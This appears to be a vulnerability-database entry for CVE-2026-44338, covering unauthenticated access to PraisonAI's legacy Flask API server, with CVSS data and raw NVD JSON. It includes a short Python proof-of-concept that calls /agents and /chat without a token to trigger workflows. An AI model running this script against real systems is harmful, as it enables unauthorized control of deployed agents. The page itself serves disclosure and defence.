Security Vulnerability Report
中文
CVE-2026-44338 CVSS 7.3 HIGH

CVE-2026-44338

Published: 2026-05-08 14:16:47
Last Modified: 2026-05-08 19:06:33

Description

PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI >= 2.5.6, < 4.6.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Replace with actual target) target_url = "http://localhost:8000" # Check if authentication is disabled by accessing /agents agents_endpoint = f"{target_url}/agents" chat_endpoint = f"{target_url}/chat" try: # Step 1: Access /agents without headers/token response = requests.get(agents_endpoint, timeout=5) if response.status_code == 200: print("[+] Vulnerability Confirmed: /agents is accessible without auth.") print(f"[+] Response: {response.text[:200]}") # Step 2: Trigger workflow via /chat payload = {"message": "test trigger"} exploit_response = requests.post(chat_endpoint, json=payload, timeout=5) if exploit_response.status_code == 200: print("[+] Exploit Successful: /chat triggered workflow without auth.") else: print(f"[-] /chat returned status: {exploit_response.status_code}") else: print(f"[-] Target not vulnerable or API not reachable. Status: {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44338", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:46.733", "lastModified": "2026-05-08T19:06:32.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. From version 2.5.6 to before version 4.6.34, PraisonAI ships a legacy Flask API server with authentication disabled by default. When that server is used, any caller that can reach it can access /agents and trigger the configured agents.yaml workflow through /chat without providing a token. This issue has been patched in version 4.6.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-668"}, {"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.5.6", "versionEndExcluding": "4.6.34", "matchCriteriaId": "0EF5C279-89D3-4209-8EF9-F5763D5843A8"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-6rmh-7xcm-cpxj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}